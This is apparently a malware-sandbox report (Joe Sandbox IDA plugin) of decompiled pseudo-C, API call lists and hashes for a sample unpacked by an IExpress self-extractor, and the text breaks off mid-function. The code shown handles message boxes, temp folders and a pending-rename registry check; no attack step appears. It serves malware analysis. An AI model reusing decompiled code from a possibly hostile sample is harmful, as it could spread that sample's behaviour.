                                                                                                                                                                                                        			E00A944B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                        				char _v576;
                                                                                                                                                                                                        				void* _v580;
                                                                                                                                                                                                        				struct HWND__* _v584;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t34;
                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                        				int _t64;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				intOrPtr* _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				intOrPtr* _t73;
                                                                                                                                                                                                        				intOrPtr* _t76;
                                                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                        				intOrPtr* _t84;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				signed int _t89;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t75 = __edx;
                                                                                                                                                                                                        				_t34 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                        				_v584 = __ecx;
                                                                                                                                                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                        				_t67 = _a4;
                                                                                                                                                                                                        				_t69 = 0xd;
                                                                                                                                                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                        				_v580 = _t37;
                                                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                                                        				if(( *0xa98a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        					_t39 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_v576 = 0;
                                                                                                                                                                                                        					LoadStringA( *0xa99a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                        					if(_v576 != 0) {
                                                                                                                                                                                                        						_t73 =  &_v576;
                                                                                                                                                                                                        						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                        						_t75 = _t16;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t43 =  *_t73;
                                                                                                                                                                                                        							_t73 = _t73 + 1;
                                                                                                                                                                                                        						} while (_t43 != 0);
                                                                                                                                                                                                        						_t84 = _v580;
                                                                                                                                                                                                        						_t74 = _t73 - _t75;
                                                                                                                                                                                                        						if(_t84 == 0) {
                                                                                                                                                                                                        							if(_t67 == 0) {
                                                                                                                                                                                                        								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                        								_t83 = _t27;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t75 = _t83;
                                                                                                                                                                                                        									_t74 = _t80;
                                                                                                                                                                                                        									E00A91680(_t80, _t83,  &_v576);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t76 = _t67;
                                                                                                                                                                                                        								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                        								_t85 = _t24;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t55 =  *_t76;
                                                                                                                                                                                                        									_t76 = _t76 + 1;
                                                                                                                                                                                                        								} while (_t55 != 0);
                                                                                                                                                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                        								_t83 = _t25 + _t74;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00A9171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t77 = _t67;
                                                                                                                                                                                                        							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                        							_t81 = _t18;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t58 =  *_t77;
                                                                                                                                                                                                        								_t77 = _t77 + 1;
                                                                                                                                                                                                        							} while (_t58 != 0);
                                                                                                                                                                                                        							_t75 = _t77 - _t81;
                                                                                                                                                                                                        							_t82 = _t84 + 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t59 =  *_t84;
                                                                                                                                                                                                        								_t84 = _t84 + 1;
                                                                                                                                                                                                        							} while (_t59 != 0);
                                                                                                                                                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                        							_t80 = _t44;
                                                                                                                                                                                                        							if(_t80 == 0) {
                                                                                                                                                                                                        								goto L6;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_push(_v580);
                                                                                                                                                                                                        								E00A9171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        								L23:
                                                                                                                                                                                                        								MessageBeep(_a12);
                                                                                                                                                                                                        								if(E00A9681F(_t67) == 0) {
                                                                                                                                                                                                        									L25:
                                                                                                                                                                                                        									_t49 = 0x10000;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t54 = E00A967C9(_t74, _t74);
                                                                                                                                                                                                        									_t49 = 0x190000;
                                                                                                                                                                                                        									if(_t54 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t52 = MessageBoxA(_v584, _t80, "photo660", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                        								_t83 = _t52;
                                                                                                                                                                                                        								LocalFree(_t80);
                                                                                                                                                                                                        								_t39 = _t52;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(E00A9681F(_t67) == 0) {
                                                                                                                                                                                                        							L4:
                                                                                                                                                                                                        							_t64 = 0x10010;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t66 = E00A967C9(0, 0);
                                                                                                                                                                                                        							_t64 = 0x190010;
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								goto L4;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "photo660", _t64);
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00A96CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                        			}



































                                                                                                                                                                                                        0x00a9456d
                                                                                                                                                                                                        0x00a9456e
                                                                                                                                                                                                        0x00a94572
                                                                                                                                                                                                        0x00a94578
                                                                                                                                                                                                        0x00a9457c
                                                                                                                                                                                                        0x00a945cb
                                                                                                                                                                                                        0x00a94607
                                                                                                                                                                                                        0x00a94607
                                                                                                                                                                                                        0x00a9460d
                                                                                                                                                                                                        0x00a94613
                                                                                                                                                                                                        0x00a94617
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9461d
                                                                                                                                                                                                        0x00a94623
                                                                                                                                                                                                        0x00a94626
                                                                                                                                                                                                        0x00a94628
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94628
                                                                                                                                                                                                        0x00a945cd
                                                                                                                                                                                                        0x00a945cd
                                                                                                                                                                                                        0x00a945cf
                                                                                                                                                                                                        0x00a945cf
                                                                                                                                                                                                        0x00a945d2
                                                                                                                                                                                                        0x00a945d2
                                                                                                                                                                                                        0x00a945d4
                                                                                                                                                                                                        0x00a945d5
                                                                                                                                                                                                        0x00a945db
                                                                                                                                                                                                        0x00a945de
                                                                                                                                                                                                        0x00a945e3
                                                                                                                                                                                                        0x00a945e9
                                                                                                                                                                                                        0x00a945ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a945f3
                                                                                                                                                                                                        0x00a945fd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94602
                                                                                                                                                                                                        0x00a945ed
                                                                                                                                                                                                        0x00a9457e
                                                                                                                                                                                                        0x00a9457e
                                                                                                                                                                                                        0x00a94580
                                                                                                                                                                                                        0x00a94580
                                                                                                                                                                                                        0x00a94583
                                                                                                                                                                                                        0x00a94583
                                                                                                                                                                                                        0x00a94585
                                                                                                                                                                                                        0x00a94586
                                                                                                                                                                                                        0x00a9458a
                                                                                                                                                                                                        0x00a9458c
                                                                                                                                                                                                        0x00a9458f
                                                                                                                                                                                                        0x00a9458f
                                                                                                                                                                                                        0x00a94591
                                                                                                                                                                                                        0x00a94592
                                                                                                                                                                                                        0x00a9459b
                                                                                                                                                                                                        0x00a9459e
                                                                                                                                                                                                        0x00a945a3
                                                                                                                                                                                                        0x00a945a9
                                                                                                                                                                                                        0x00a945ad
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a945af
                                                                                                                                                                                                        0x00a945af
                                                                                                                                                                                                        0x00a945bf
                                                                                                                                                                                                        0x00a9462d
                                                                                                                                                                                                        0x00a94630
                                                                                                                                                                                                        0x00a9463d
                                                                                                                                                                                                        0x00a9464e
                                                                                                                                                                                                        0x00a9464e
                                                                                                                                                                                                        0x00a9463f
                                                                                                                                                                                                        0x00a94640
                                                                                                                                                                                                        0x00a94647
                                                                                                                                                                                                        0x00a9464c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9464c
                                                                                                                                                                                                        0x00a94666
                                                                                                                                                                                                        0x00a9466d
                                                                                                                                                                                                        0x00a9466f
                                                                                                                                                                                                        0x00a94675
                                                                                                                                                                                                        0x00a94675
                                                                                                                                                                                                        0x00a945ad
                                                                                                                                                                                                        0x00a94527
                                                                                                                                                                                                        0x00a9452e
                                                                                                                                                                                                        0x00a9453f
                                                                                                                                                                                                        0x00a9453f
                                                                                                                                                                                                        0x00a94530
                                                                                                                                                                                                        0x00a94531
                                                                                                                                                                                                        0x00a94538
                                                                                                                                                                                                        0x00a9453d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9453d
                                                                                                                                                                                                        0x00a94554
                                                                                                                                                                                                        0x00a9455a
                                                                                                                                                                                                        0x00a9455a
                                                                                                                                                                                                        0x00a9455a
                                                                                                                                                                                                        0x00a94525
                                                                                                                                                                                                        0x00a9468c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                        • MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A945A3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A945E3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 00A9460D
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00A94630
                                                                                                                                                                                                        • MessageBoxA.USER32(?,00000000,photo660,00000000), ref: 00A94666
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00A9466F
                                                                                                                                                                                                          • Part of subcall function 00A9681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A9686E
                                                                                                                                                                                                          • Part of subcall function 00A9681F: GetSystemMetrics.USER32(0000004A), ref: 00A968A7
                                                                                                                                                                                                          • Part of subcall function 00A9681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A968CC
                                                                                                                                                                                                          • Part of subcall function 00A9681F: RegQueryValueExA.ADVAPI32(?,00A91140,00000000,?,?,0000000C), ref: 00A968F4
                                                                                                                                                                                                          • Part of subcall function 00A9681F: RegCloseKey.ADVAPI32(?), ref: 00A96902
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                        • String ID: LoadString() Error. Could not load string resource.$photo660
                                                                                                                                                                                                        • API String ID: 3244514340-1652614573
                                                                                                                                                                                                        • Opcode ID: 3ab52fdcb78c6fd26376186aa6fdefc8b303e7811793601cc513009e7fda2785
                                                                                                                                                                                                        • Instruction ID: c27248ad4f88c2f1bd6b22dc164baba6ac3f33d16f40067c2cc6b4cb95037dec
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ab52fdcb78c6fd26376186aa6fdefc8b303e7811793601cc513009e7fda2785
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2151B276B00215ABDF219FA88D48BAA7BF9EF4A300F154196F949A7241DB319D06CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00A953A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				long _t13;
                                                                                                                                                                                                        				int _t14;
                                                                                                                                                                                                        				CHAR* _t20;
                                                                                                                                                                                                        				int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				CHAR* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                        				_t32 = __edx;
                                                                                                                                                                                                        				_t20 = __ecx;
                                                                                                                                                                                                        				_t29 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E00A9171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                        					_t34 = _t34 + 0x10;
                                                                                                                                                                                                        					_t29 = _t29 + 1;
                                                                                                                                                                                                        					E00A91680(_t32, 0x104, _t20);
                                                                                                                                                                                                        					E00A9658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                        					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                        					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t29 < 0x190) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t30 = 0;
                                                                                                                                                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                        						_t30 = 1;
                                                                                                                                                                                                        						DeleteFileA(_t32);
                                                                                                                                                                                                        						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return E00A96CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t30 = 1;
                                                                                                                                                                                                        				 *0xa98a20 = 1;
                                                                                                                                                                                                        				goto L5;
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A9171E: _vsnprintf.MSVCRT ref: 00A91750
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A953FB
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A95402
                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A9541F
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A9542B
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A95434
                                                                                                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A95452
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                        • API String ID: 1082909758-3862032828
                                                                                                                                                                                                        • Opcode ID: 0f9fbdeb4d698ed051bc2a18fb6d6bdfb0156862a0561037a0cdb852bfd1e020
                                                                                                                                                                                                        • Instruction ID: 8635cb46836e4ae66b512fdc8b20d6126ee7a366eb4168103feabfbf0b5f4f57
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f9fbdeb4d698ed051bc2a18fb6d6bdfb0156862a0561037a0cdb852bfd1e020
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB110171B0050467DB21EB769D4AFAF36AEEFD2311F000127B646D2190CE74898387A2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 563 a9256d-a9257d 564 a92583-a92589 563->564 565 a92622-a92627 call a924e0 563->565 567 a925e8-a92607 RegOpenKeyExA 564->567 568 a9258b 564->568 572 a92629-a9262f 565->572 569 a92609-a92620 RegQueryInfoKeyA 567->569 570 a925e3-a925e6 567->570 568->572 573 a92591-a92595 568->573 574 a925d1-a925dd RegCloseKey 569->574 570->572 573->572 575 a9259b-a925ba RegOpenKeyExA 573->575 574->570 575->570 576 a925bc-a925cb RegQueryValueExA 575->576 576->574
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00A9256D(signed int __ecx) {
                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                        				int _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t31 = E00A924E0(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t34 = _t13 - 1;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                        							if(_t24 == 0) {
                                                                                                                                                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                        								L6:
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                        								RegCloseKey(_v12); // executed
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							_t31 = _v8;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t31;
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00A94096,00A94096,?,00A91ED3,00000001,00000000,?,?,00A94137,?), ref: 00A925B2
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00A94096,?,00A91ED3,00000001,00000000,?,?,00A94137,?,00A94096), ref: 00A925CB
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,00A91ED3,00000001,00000000,?,?,00A94137,?,00A94096), ref: 00A925DD
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00A94096,00A94096,?,00A91ED3,00000001,00000000,?,?,00A94137,?), ref: 00A925FF
                                                                                                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00A94096,00000000,00000000,00000000,00000000,?,00A91ED3,00000001,00000000), ref: 00A9261A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 00A925A8
                                                                                                                                                                                                        • PendingFileRenameOperations, xrefs: 00A925C3
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00A925F5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                        • API String ID: 2209512893-559176071
                                                                                                                                                                                                        • Opcode ID: 27dc128831f1b6fded482514d9a9a9a0e890d1ee6d49d909b44c7e3342f3a608
                                                                                                                                                                                                        • Instruction ID: 54a709df246bd31059a5b962e9fe98f772d57d76fb340c7e627776cedc40e960
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27dc128831f1b6fded482514d9a9a9a0e890d1ee6d49d909b44c7e3342f3a608
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F114F35B42228BBAF20DB919C09EFBBEFCEF567A1F104056B909E2011DA345E45D7E1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int* _t25;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed char _t41;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E00A97155();
                                                                                                                                                                                                        				_push(0x58);
                                                                                                                                                                                                        				_push(0xa972b8);
                                                                                                                                                                                                        				E00A97208(__ebx, __edi, __esi);
                                                                                                                                                                                                        				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                        				_t53 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                        					if(0 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(0 != _t56) {
                                                                                                                                                                                                        						Sleep(0x3e8);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t58 = 1;
                                                                                                                                                                                                        						_t53 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_t67 =  *0xa988b0 - _t58; // 0x2
                                                                                                                                                                                                        					if(_t67 != 0) {
                                                                                                                                                                                                        						__eflags =  *0xa988b0; // 0x2
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							 *0xa981e4 = _t58;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0xa988b0 = _t58;
                                                                                                                                                                                                        							_t37 = E00A96C3F(0xa910b8, 0xa910c4); // executed
                                                                                                                                                                                                        							__eflags = _t37;
                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                        								goto L13;
                                                                                                                                                                                                        							} else {
